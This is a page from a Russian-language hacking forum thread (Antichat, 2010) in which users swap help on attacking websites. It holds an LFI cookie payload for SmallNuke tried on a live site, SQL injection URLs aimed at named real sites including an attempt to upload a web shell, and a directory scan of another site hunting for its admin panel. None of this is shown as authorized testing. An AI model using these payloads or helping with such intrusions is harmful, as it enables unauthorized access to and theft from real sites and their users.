HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1356 из 2422 « Первая < 356856125613061346 1352 1353 1354 1355 1356 1357 1358 1359 1360 13661406145618562356 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2010, 08:54
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию
/usr/local/www/new/
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 16.06.2010, 11:03
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
С нами: 9132514

Репутация: 41
По умолчанию
Нашел LFI в SmallNuke

common.php
PHP код:
   if ((!isset ($_SESSION['snss_lang'])) AND (isset($_COOKIE['snss_lang']))) {
      session_register ("snss_lang");
      $_SESSION['snss_lang'] = $conf['default_lang'];
      if ($_COOKIE['snss_lang'] != "") {
         $_SESSION['snss_lang'] = $_COOKIE['snss_lang'];
      } else {
         $_SESSION['snss_lang'] = $conf['default_lang'];
      }
   }
   define ('_SNSS_LANG',''.$_SESSION['snss_lang'].''); 
index.php
PHP код:
include (SN_PathRoot.'inc/common.php');

if (file_exists (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php')) {
   include_once (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php');
} else {
   eror ("Eror! Lang file is absent");
   exit;

У себя тестировал, например, куки snss_lang = /../../robots.txt%00 отлично инключится.

Пробую на реальном сайте (http://www.bifilife.ru/index.php)
ru.php%00 и en.php%00 работают, а вот за пределы lang никак не получается вылезти.
Что именно не так делаю?) (пробовал на нескольких)
 
Ответить с цитированием

  #3  
Старый 16.06.2010, 11:48
manerus
Новичок
Регистрация: 10.08.2009
Сообщений: 16
С нами: 8816848

Репутация: 1
По умолчанию
помогите подобрать таблицы не как не могу найти даже с помощью SQLIHelperV.2.7 не чего не находит(
версия 4.1.22-standard
сразу скажу что это шоп.
пробовал подбирать в ручную но тчетно.

могу в пм кинуть линк кто сможет мне объеснить!
 
Ответить с цитированием

  #4  
Старый 16.06.2010, 12:01
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию
В четвертой версии таблицы только брутить.
SIPT умеет, Toolza тоже умеет.
 
Ответить с цитированием

  #5  
Старый 16.06.2010, 14:53
manerus
Новичок
Регистрация: 10.08.2009
Сообщений: 16
С нами: 8816848

Репутация: 1
По умолчанию
Цитата:
Сообщение от wildshaman  
В четвертой версии таблицы только брутить.
SIPT умеет, Toolza тоже умеет.
к сожелению он тоже не помог((
 
Ответить с цитированием

  #6  
Старый 16.06.2010, 13:21
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию
помогите найти админку _http://www.aaptnet.org/home/
 
Ответить с цитированием

  #7  
Старый 16.06.2010, 13:48
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от jecka3000  
помогите найти админку _http://www.aaptnet.org/home/
http://www.aaptnet.org/cms/
http://www.aaptnet.org/members/

(403) ((
Последний раз редактировалось Konqi; 16.06.2010 в 13:57..
 
Ответить с цитированием

  #8  
Старый 16.06.2010, 13:59
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию
Цитата:
Сообщение от jecka3000  
помогите найти админку _http://www.aaptnet.org/home/

http://aaptnet.org/.htaccess 403 Forbidden
http://aaptnet.org/.htconfig 403 Forbidden
http://aaptnet.org/.htpasswd 403 Forbidden
http://aaptnet.org/education 301 Moved Permanently
http://aaptnet.org/cgi.cgi 403 Forbidden
http://aaptnet.org/cms 301 Moved Permanently
http://aaptnet.org/css 301 Moved Permanently
http://aaptnet.org/favicon.ico HTTP 200 OK
http://aaptnet.org/img 301 Moved Permanently
http://aaptnet.org/index.php 302 Found
http://aaptnet.org/index.py 403 Forbidden
http://aaptnet.org/login.php 401 Internal Server Error
http://aaptnet.org/manager 301 Moved Permanently
http://aaptnet.org/news 301 Moved Permanently
http://aaptnet.org/picture_library 301 Moved Permanently
http://aaptnet.org/quikstore.cgi 403 Forbidden
http://aaptnet.org/resources 301 Moved Permanently
http://aaptnet.org/test 301 Moved Permanently
http://aaptnet.org/web_store.cgi 403 Forbidden
http://aaptnet.org/home 301 Moved Permanently
http://aaptnet.org/members 301 Moved Permanently
http://aaptnet.org/server-status 403 Forbidden
http://aaptnet.org/.htaccess~ 403 Forbidden
http://aaptnet.org/.htpasswd~ 403 Forbidden
 
Ответить с цитированием

  #9  
Старый 16.06.2010, 14:27
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию
пробую залить шелл http://www.pogoda.ua/index.php?id=-4+union+select+1,file_priv,3,4,5+from+mysql.user--
ничего не получается, есть поле users c test;test, http://www.pogoda.ua/admin тож ничего не происходит...есть вообще какие варианты попасть в админку или залить шелл?)
 
Ответить с цитированием

  #10  
Старый 16.06.2010, 14:28
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию
хитромудрая скуль и походу тут не mysql

http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=

помогите с советом
 
Ответить с цитированием
Ответ
Страница 1356 из 2422 « Первая < 356856125613061346 1352 1353 1354 1355 1356 1357 1358 1359 1360 13661406145618562356 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.